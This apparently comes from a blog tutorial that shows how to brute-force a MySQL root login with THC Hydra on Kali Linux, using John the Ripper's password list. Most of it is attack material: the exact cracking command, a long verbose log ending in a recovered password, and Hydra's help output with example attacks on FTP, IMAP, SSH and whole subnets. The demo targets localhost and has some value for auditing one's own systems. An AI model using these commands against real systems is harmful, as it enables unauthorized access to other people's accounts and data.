Weak password is still a big problem in the world of security. User need to set a strong password to restrict the access of data from anonymous user. Even a 6 digit pin is not secure enough, it can be broken down within an hour using brute force. A thumb rule of password is, it should be longer(more than 9 words) with different or multiple alphabetic+ numeric + special symbol. In this guide we will use Mysql as a target service and show how to crack password using Hydra in Kali Linux.

There are several Password cracking software available, Hydra can be used and compile cleanly on Linux, Windows , QNX, OSX, FreeBSD/OpenBSD, at this time THC Hydra tool supports some of following protocols.

Caisco AAA, Caisco auth, Caisco enable, CVS, Firebird, Asterisk, AFP, HTTP-FORM-GET, HTTP-GET, HTTP-FORM-POST, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTP-POST, ICQ, IMAP, IRC, MS-SQL, LDAP, MYSQL, NCP, NNTP, Oracle SID, ORACLE, PC-Anywhere, PCNFS, POP3, RDP, POSTGRES, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP V1-V3, SOCKS5 ,SSH (VERSION 1 AND VERSION 2), SSHKEY, sunversion, Teamspeak, Telnet, VMware-Auth, VNC and XMPP.

SEE ALSO: Is it possible to control the direction of electron?

Hydra is a parallelized login cracker or password cracker, with faster and flexible features. On Kali Linux, it is pre-installed while on other linux like Ubuntu or any other Debian flavor Linux, one can easily install it using synaptic package manager.

Hydra use password list for cracking password using brute forcing method. There is multiple password list available, but in this guide we will use default password list provided by John the Ripper which is another password cracking tool.

Kali Linux default password list path:

/usr/share/john/password.lst

Kali Linux Hydra Password Cracking Command:

warmachine@kali:~$ hydra -t 1 -l root -P /usr/share/john/password.lst -vV localhost mysql

In the above command, we target “root” user .Password will be cracked by Hydra using password list. Hydra can use parallel thread , but in this case we used 1 (one attempt at a time). The next option tells i.e “l” which tells use user-name provided by user, In this case “root” is user-name. The next option is “P” for using password list.

You can watch video tutorial on How to crack password using hydra in kali linux.

How To Crack Password using Hydra in Kali Linux

https://youtu.be/GNWPKBJaoco

Output :

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-03-13 19:44:45
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 1 task per 1 server, overall 64 tasks, 3559 login tries (l:1/p:3559), ~55 tries per task
[DATA] attacking service mysql on port 3306
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target localhost - login "root" - pass "#!comment: This list has been compiled by Solar Designer of Openwall Project" - 1 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "#!comment: in 1996 through 2011.  It is assumed to be in the public domain." - 2 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "#!comment:" - 3 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "#!comment: This list is based on passwords most commonly seen on a set of Unix" - 4 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "#!comment: systems in mid-1990's, sorted for decreasing number of occurrences" - 5 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "#!comment: (that is, more common passwords are listed first).  It has been" - 6 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "#!comment: revised to also include common website passwords from public lists" - 7 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "#!comment: of "top N passwords" from major community website compromises that" - 8 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "#!comment: occurred in 2006 through 2010." - 9 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "#!comment:" - 10 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "#!comment: Last update: 2011/11/20 (3546 entries)" - 11 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "#!comment:" - 12 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "#!comment: For more wordlists, see http://www.openwall.com/wordlists/" - 13 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "123456" - 14 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "12345" - 15 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "password" - 16 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "password1" - 17 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "123456789" - 18 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "12345678" - 19 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "1234567890" - 20 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "abc123" - 21 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "computer" - 22 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "tigger" - 23 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "1234" - 24 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "qwerty" - 25 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "money" - 26 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "carmen" - 27 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "mickey" - 28 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "secret" - 29 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "summer" - 30 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "internet" - 31 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "a1b2c3" - 32 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[ATTEMPT] target localhost - login "root" - pass "123" - 33 of 3559 [child 0]
[VERBOSE] using default db 'mysql'
[3306][mysql] host: localhost   login: root   password: 123
[STATUS] attack finished for localhost (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-03-13 19:45:02

Eh! We found 1 valid password…… 😉

For more information use command:

root@kali:~# hydra -h
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -w / -W TIME  waittime for responses (32s) / between connects per thread
  -4 / -6   prefer IPv4 (default) or IPv6 addresses
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode 
  -q        do not print messages about connection erros
  -U        service module usage details
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: sapr3 afp ncp oracle.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup.
E.g.:  % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)
       % export HYDRA_PROXY_HTTP=http://proxy:8080
       % export HYDRA_PROXY_AUTH=user:pass

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

Have something to add in How To Crack Password using Hydra in Kali Linux?? Please share in comments.

Follow us on Facebook, Google Plus and Twitter.